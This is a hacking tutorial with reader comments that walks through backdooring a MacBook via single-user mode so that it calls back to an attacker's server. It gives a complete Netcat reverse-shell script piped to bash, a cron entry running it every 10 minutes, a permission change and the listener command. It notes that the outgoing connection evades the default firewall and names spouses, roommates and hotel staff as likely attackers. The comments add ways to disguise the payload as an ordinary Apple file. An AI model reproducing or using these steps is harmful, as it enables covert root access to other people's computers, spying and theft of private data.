Hacking macOS: How to Connect to MacBook Backdoors from Anywhere in the World

How to Connect to MacBook Backdoors from Anywhere in the World

Backdooring a powered-off MacBook is easy when a few minutes of physical access is allowed. That attack works well if the hacker also shares a Wi-Fi network with the victim, but this time, I'll show how to remotely establish a connection to the backdoored MacBook as it moves between different Wi-Fi networks.

I've already shown how to backdoor a MacBook using a simple Netcat payload. This time, instead of creating a Netcat listener on the laptop and using an incoming connection to control it, the listener is created on an attacker-controlled VPS (virtual private server), and the MacBook periodically uses outgoing transmissions to connect to it. The roles of the Netcat commands are reversed; the attacker waits for incoming connections. The macOS default firewall settings only filter incoming connections, so this will entirely evade default firewall configurations.

This kind of physical attack can be performed by coworkers, neighbors, hotel maids, roommates, friends, spouses, or anyone with a few minutes of physical access to the target MacBook.

Step 1: Purchase the VPS

There are no particular VPS configurations required in this method. A VPS with minimum specifications will perform well for this specific attack as there will not be any powerful CPU or RAM usage required.

The VPS should be online and accessible via SSH before booting the MacBook into single-user mode. Take note of the VPS's IP address, as it's required in the next step.

Step 2: Create the Netcat Payload

This method is a standalone method and does not require the Netcat payload used in my previous article.

While in single-user mode, instead of creating a listener on the MacBook, Netcat will be used to periodically connect to the attacker's server at a set interval. To do this, nano can be used to save the below BASH script into a file called payload.

nano /etc/payload

Type the below script into the nano terminal (The VPS-IP-ADDRESS-HERE should be changed to the attacker's IP address for the VPS), then save and exit by pressing Ctrl + X, then Y, then Return.

#!/bin/bash

n=$(ps aux | grep -o [1]234)

if [[ $n = "" ]]; then
    mkfifo f
    nc VPS-IP-ADDRESS-HERE 1234 < f | /bin/bash -i > f 2>&1
fi

Much like my previous BASH script, the first line (n=$(ps aux | grep -o [1]234)), creates a variable n, which checks to see if port 1234 is already open. This port detection is achieved using ps, a tool used to view running background processes.

The following line (if [[ $n = "" ]]; then) is the start of an if statement which says if the variable n (port 1234) is not found, mkfifo, a tool used to create a "named pipe," will create a file called f. The filename here is totally arbitrary and uses "f" for simplicity.

Following the mkfifo command is the Netcat command (nc VPS-IP-ADDRESS-HERE 1234 < f | /bin/bash -i > f 2>&1) which is the primary difference compared to my previous script. Instead of opening a port, it tries to connect to port 1234 on the attacker-controlled VPS. Commands are again piped using the f file to grant the attacker access to a full BASH terminal.

As said before, the VPS-IP-ADDRESS-HERE should be changed to the attacker's IP address for the VPS. For example, if the attacker's IP address were 11.22.33.44, that line of the script would appear as such:

nc 11.22.33.44 1234 < f | /bin/bash -i > f 2>&1

Step 3: Use Cron to Execute the Payload

Next, crontab, a feature of cron, will be used to schedule the BASH script ("payload") to execute every 10 minutes. The below command can be used to accomplish this.

env EDITOR=nano crontab -e

A new nano terminal will open. Type the below into nano, then save and exit the terminal.

*/10 * * * * /etc/payload

Readers interested in scheduling cronjobs at intervals other than 10 minutes should check out TecAdmin's useful article.

Step 4: Elevate the Payload File Permissions

Lastly, the payload file permissions should be upgraded using the below chmod command. This will allow the payload to execute without user input.

chmod 777 /etc/payload

Step 5: Shut Down the MacBook

When that's done, enter the below command into the single-user terminal to shut down the laptop.

shutdown -h now

That's it for backdooring the macOS device. When the owner of the laptop turns the device on, the Netcat command will execute every 10 minutes and attempt to connect to the attacker's server. If the server is not online, the Netcat command will continue to fail silently and try again at the next interval.

Step 6: Wait for Incoming Connections

Now, with the MacBook backdoored, the final step is to start the Netcat listener on the VPS and wait for an incoming connection. This can be done using the below Netcat command.

nc -l -p 1234

Netcat will listen (-l) for incoming connections on every available interface on port (-p) 1234. That's all there is to it.

When a new Netcat connection is established, the attacker will have full root access to the compromised MacBook. In upcoming articles, I'll show a few post-explotation tricks such as reading private Mail messages, dumping Chrome browser data, and escalating privileges.

Readers interested in defending against such attacks should review the "How to Protect Yourself from Single-User Mode Abuse" section of my previous article.

Just updated your iPhone to iOS 18? You'll find a ton of hot new features for some of your most-used Apple apps. Dive in and see for yourself:

Cover image by Nilotpal Kalita/Unsplash; Screenshots by tokyoneon/Null Byte

3 Comments

Some improvements:

To hide the suspicious "f" file, just type:
mkfifo .f
nc VPS-IP-ADDRESS-HERE 1234 < .f | /bin/bash -i > .f 2>&1

To execute the cronjob if your target logged in with other accounts (else { it only works if the target log in with the root user };) type:

"nano /etc/crontab" instead of "env EDITOR=nano crontab -e"
And add the following line at the bottom:
"?/10 ? ? ? ? root /etc/payload"

Please change the question marks in stars... unexpectedly they moved into points in this comment section...

ALPHA PREDATOR

Hey Alpha,

Yup, adding a dot before the filename will make the "f" file hidden. But if you're trying to keep the file from being located, it might be better to hide it in plain site. For example, put it in the ~/Library directory with a filename like "com.apple.plist" to make it appear as an ordinary Apple file.

it only works if the target log in with the root user

This isn't true. Adding "root" before the payload path isn't required. When the user logs into their (non-root) account, a root shell will be established. This is because the cronjob is running as root already. When you enter single-user mode to embed the cron, it's done using a root shell.

For example, put it in the ~/Library directory with a filename like "com.apple.plist" to make it appear as an ordinary Apple file.

This is a very good idea! I think if anyone googles com.apple.plist he can't find some "WARNING DANGEROUS! ITS A FILE WHICH IS USED BY AN EXPLOIT!!!" logs or anything else and in the ~/Library/ folder there are sooo many of com.apple/anythingelse.plist files!!

This isn't true. Adding "root" before the payload path isn't required. When the user logs into their (non-root) account, a root shell will be established. This is because the cronjob is running as root already. When you enter single-user mode to embed the cron, it's done using a root shell.

I don't know why, but for some reason it doesn't worked with the "crontab -e" as root. In my case, it worked only directly after backdooring, but not after rebooting 2 times.

Maybe it's because I using an older Mac...?

ALPHA

Share Your Thoughts

  • Hot
  • Latest